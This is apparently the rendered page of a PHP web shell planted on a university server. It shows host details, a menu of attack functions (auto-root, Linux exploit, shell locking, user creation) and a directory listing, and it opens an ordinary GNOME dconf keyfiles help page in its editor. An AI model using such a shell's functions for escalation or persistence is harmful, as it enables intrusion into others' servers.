Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
share /
help /
C /
system-admin-guide /
[ HOME SHELL ]
Name
Size
Permission
Action
appearance.page
538
B
-rw-r--r--
autostart-applications.page
1.88
KB
-rw-r--r--
backgrounds-extra.page
4.6
KB
-rw-r--r--
dconf-custom-defaults.page
4.03
KB
-rw-r--r--
dconf-keyfiles.page
3.09
KB
-rw-r--r--
dconf-lockdown.page
3
KB
-rw-r--r--
dconf-nfs-home.page
2.97
KB
-rw-r--r--
dconf.page
2.02
KB
-rw-r--r--
dconf-profiles.page
3.99
KB
-rw-r--r--
dconf-snippets.xml
1.62
KB
-rw-r--r--
desktop-background.page
3.75
KB
-rw-r--r--
desktop-favorite-applications.page
4.58
KB
-rw-r--r--
desktop-lockscreen.page
3.02
KB
-rw-r--r--
desktop-shield.page
2.91
KB
-rw-r--r--
extensions-enable.page
2.44
KB
-rw-r--r--
extensions-lockdown.page
3.32
KB
-rw-r--r--
extensions.page
1.82
KB
-rw-r--r--
fonts.page
2.53
KB
-rw-r--r--
fonts-user.page
1.7
KB
-rw-r--r--
gsettings-browse.page
2.65
KB
-rw-r--r--
index.page
593
B
-rw-r--r--
keyboard-compose-key.page
2.43
KB
-rw-r--r--
keyboard-layout.page
3.93
KB
-rw-r--r--
legal.xml
295
B
-rw-r--r--
lockdown-command-line.page
4.74
KB
-rw-r--r--
lockdown-file-saving.page
2.8
KB
-rw-r--r--
lockdown-logout.page
2.46
KB
-rw-r--r--
lockdown-online-accounts.page
3.34
KB
-rw-r--r--
lockdown-printing.page
2.74
KB
-rw-r--r--
lockdown-repartitioning.page
2.92
KB
-rw-r--r--
lockdown-single-app-mode.page
4.53
KB
-rw-r--r--
login-automatic.page
2.49
KB
-rw-r--r--
login-banner.page
2.59
KB
-rw-r--r--
login-enterprise.page
4.66
KB
-rw-r--r--
login-fingerprint.page
2.74
KB
-rw-r--r--
login-logo.page
3.21
KB
-rw-r--r--
login.page
687
B
-rw-r--r--
login-userlist-disable.page
1.84
KB
-rw-r--r--
logout-automatic.page
4.58
KB
-rw-r--r--
mime-types-application.page
4.23
KB
-rw-r--r--
mime-types-application-user.page
4.04
KB
-rw-r--r--
mime-types-custom.page
4.06
KB
-rw-r--r--
mime-types-custom-user.page
4.03
KB
-rw-r--r--
mime-types.page
3.85
KB
-rw-r--r--
network.page
431
B
-rw-r--r--
network-server-list.page
2.2
KB
-rw-r--r--
network-vpn.page
1.6
KB
-rw-r--r--
overrides.page
1.74
KB
-rw-r--r--
power-dim-screen.page
3.46
KB
-rw-r--r--
processes.page
4.54
KB
-rw-r--r--
session-custom.page
3.58
KB
-rw-r--r--
session-debug.page
2.22
KB
-rw-r--r--
session-user.page
3.05
KB
-rw-r--r--
setup.page
318
B
-rw-r--r--
software.page
795
B
-rw-r--r--
sundry.page
387
B
-rw-r--r--
user-settings.page
870
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dconf-keyfiles.page
<page xmlns="http://projectmallard.org/1.0/" xmlns:its="http://www.w3.org/2005/11/its" type="topic" style="task" id="dconf-keyfiles"> <info> <link type="guide" xref="setup" /> <link type="seealso" xref="dconf" /> <link type="seealso" xref="dconf-profiles" /> <revision pkgversion="3.30" date="2019-02-08" status="review"/> <credit type="author copyright"> <name>Ryan Lortie</name> <email>desrt@desrt.ca</email> <years>2012</years> </credit> <credit type="author"> <name>Aruna Sankaranarayanan</name> <email>aruna.evam@gmail.com</email> </credit> <credit type="editor"> <name>Petr Kovar</name> <email>pknbe@volny.cz</email> <years>2019</years> </credit> <include href="legal.xml" xmlns="http://www.w3.org/2001/XInclude"/> <desc>Use <sys its:translate="no">dconf</sys> <em>keyfiles</em> to configure specific settings with a text editor.</desc> </info> <title>Control system settings with keyfiles</title> <p>System database files, located in <file its:translate="no">/etc/dconf/db</file>, cannot be edited because they are written in GVDB format. In order to change system settings using a text editor, you can modify <em>keyfiles</em> found in <em>keyfile directories</em>. Each keyfile directory corresponds to a particular system database file, and has the same name as the database file with a ā.dā extension appended (for example, <file>/etc/dconf/db/local.d</file>). All keyfile directories are found in <file its:translate="no">/etc/dconf/db</file>, and each one contains keyfiles in a special format that can be compiled into the <sys its:translate="no">dconf</sys> database.</p> <listing> <title>A keyfile in this directory will look something like this:</title> <code> # Some useful default settings for our site [system/proxy/http] host='172.16.0.1' enabled=true [org/gnome/desktop/background] picture-uri='file:///usr/local/rupert-corp/company-wallpaper.jpeg' </code> </listing> <note style="important"> <p><cmd>dconf update</cmd> must be run whenever you modify a keyfile. When you do this, <sys its:translate="no">dconf</sys> compares the timestamp on a system database file with the timestamp on the corresponding keyfile directory. If the timestamp on the keyfile directory is more recent than the one on the database file, <sys its:translate="no">dconf</sys> regenerates the <code>system-db</code> file and sends a notification to the system <sys>D-Bus</sys>, which in turn notifies all running applications to reread their settings.</p> </note> <p>The group name in the keyfile references a <link href="https://developer.gnome.org/GSettings/">GSettings schema ID</link>. For example, <code>org/gnome/desktop/background</code> references the schema <code>org.gnome.desktop.background</code>, which contains the key <code>picture-uri</code>.</p> <p>The values under a group are expected in <link href="https://developer.gnome.org/glib/stable/gvariant-text.html">serialized GVariant form</link>.</p> </page>
Close